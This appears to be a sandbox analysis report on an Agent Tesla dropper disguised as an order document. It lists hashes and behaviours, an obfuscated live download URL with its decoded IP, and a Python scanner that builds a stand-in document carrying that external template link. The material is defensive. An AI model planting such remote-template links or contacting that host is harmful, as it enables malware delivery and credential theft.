General
Target: Order 274791085.docx
Size: 10KB
Sample: 230419-l86a6ahh34
MD5: 194e686634e2515c423cb0cd5f9c981a
SHA1: b792d00fecc27915c2a28490be4ff2e8228583e1
SHA256: 0a8e2816b7403cd8f517b41571ad43bb532badb8638f088cadd66dfc7c1e81b9
SHA512: 99067893db72452ff46b2fb195497427923dee9c020a6137ed178c75c0a3a98bb06e25b2a8bf509b539722dc46302a8b9590a89390225410290175e4fa5f7ed8
SSDEEP: 192:ScIMmtPGT7G/bIwXOVOku5SEzBC4vNq6sM63qR:SPXuT+xXOVOZhlqH+
Static task: static1
Behavioral task: behavioral1 (sample: Order 274791085.docx; resource: win7-20230220-en)
Behavioral task: behavioral2 (sample: Order 274791085.docx; resource: win10v2004-20230220-en)
Malware Config
Extracted (external download location referenced by the document):
http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%22IIOOOWOEOEOEOEOEOEOISISODOEOEOEOODOOOOOOWWOWOQQQOWOWOWOWOIIIDIIFIFIWOEOEOEOIFIDIFODFI@1806682825/e/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc
The URL is built to be hard to read and hard to match. Everything before the "@" is a long percent-encoded userinfo string (%23 decodes to "#", %22 to a double quote) that has no effect on which host is contacted, and the host itself is the bare decimal integer 1806682825 rather than a dotted-quad address; that integer decodes to the IPv4 address 107.175.202.201. Both tricks defeat naive string or regex matching on the URL, so pivot on the decoded host and the ".doc" path, not on the raw string.
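The two static findings on this page, an OpenXML external relationship and a deliberately obfuscated target URL, can both be checked with a small script. The following is an added example, not code from the report or from the sandbox vendor: it constructs a stand-in .docx in memory (the use of an attachedTemplate relationship in word/_rels/settings.xml.rels is an assumption; the real sample's relationship type is not stated on this page), walks every .rels part for TargetMode="External", and then decodes the target, copied verbatim from the Malware Config section, by stripping the userinfo noise and converting the decimal host to dotted-quad form. The scanner does not depend on the relationship type, so it also catches external oleObject, hyperlink or image targets in other documents.

```python
import io
import ipaddress
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import unquote, urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Copied verbatim from the report's "Malware Config" section.
EXTRACTED_TARGET = "http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%22IIOOOWOEOEOEOEOEOEOISISODOEOEOEOODOOOOOOWWOWOQQQOWOWOWOWOIIIDIIFIFIWOEOEOEOIFIDIFODFI@1806682825/e/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc"


def build_sample_docx() -> bytes:
    """Construct a minimal OOXML package that mimics the report's finding.

    This is a stand-in, not the real sample: placing an attachedTemplate
    relationship in settings.xml.rels is an assumption. The scanner below
    does not depend on the relationship type, only on TargetMode="External".
    """
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        "</Types>"
    )
    root_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL_BASE}officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    settings_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL_BASE}attachedTemplate" '
        f'Target="{EXTRACTED_TARGET}" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL_BASE}styles" Target="styles.xml"/>'
        "</Relationships>"
    )
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        zf.writestr("word/settings.xml", f'<w:settings xmlns:w="{w_ns}"/>')
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """Return every relationship with TargetMode="External" in any .rels part.

    Internal relationships (the default) point inside the package; an external
    one makes Office fetch content from elsewhere when the document is opened.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                findings.append({
                    "part": name,
                    "rel_type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                })
    return findings


def analyse_target(url: str) -> dict:
    """Split an external target into the pieces an analyst pivots on."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    decoded_host = host
    if host.isdigit() and int(host) <= 0xFFFFFFFF:
        # A bare integer host is a decimal-encoded IPv4 address (browsers and
        # the Windows URL stack accept the form); decode it to dotted quad.
        decoded_host = str(ipaddress.IPv4Address(int(host)))
    path = unquote(parts.path)
    return {
        "scheme": parts.scheme,
        "has_userinfo": "@" in parts.netloc,  # text before '@' never affects routing
        "userinfo": unquote(parts.netloc.rpartition("@")[0]),
        "host": host,
        "decoded_host": decoded_host,
        "path": path,
        "extension": path.rsplit(".", 1)[-1].lower() if "." in path else "",
    }


def scan(docx_bytes: bytes) -> list:
    """Find external relationships and annotate each target."""
    return [{**rel, **analyse_target(rel["target"])} for rel in external_relationships(docx_bytes)]


if __name__ == "__main__":
    for r in scan(build_sample_docx()):
        print(f"{r['part']}: {r['rel_type']} -> {r['scheme']}://{r['decoded_host']}{r['path']}")
        print(f"  raw host: {r['host']}  userinfo present: {r['has_userinfo']}  extension: {r['extension']}")
```

Run against a real file by replacing build_sample_docx() with the bytes of the document; any hit with has_userinfo set or a decoded_host that differs from host deserves a closer look, and the decoded host is the value to block or hunt for, since the raw string will not match a dotted-quad indicator.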
Targets
Target: Order 274791085.docx (10KB; hashes as listed under General above)
AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and information stealer, originally written in Visual Basic .NET; it is best known for harvesting credentials from browsers, mail clients and other applications and exfiltrating them.
Signatures:
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location (the document's external relationship points at the URL listed under Malware Config)
- Executes dropped EXE
- Loads dropped DLL
- Uses the Visual Basic compiler (vbc.exe) for execution
- Accesses Microsoft Outlook profiles (mail-client credential theft, consistent with Agent Tesla's stealer functionality)
- Adds Run key to start application (registry Run-key persistence)
- Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP.
- Suspicious use of SetThreadContext (rewriting a thread's context, typically in a suspended child process, is the primitive behind process hollowing and related injection techniques)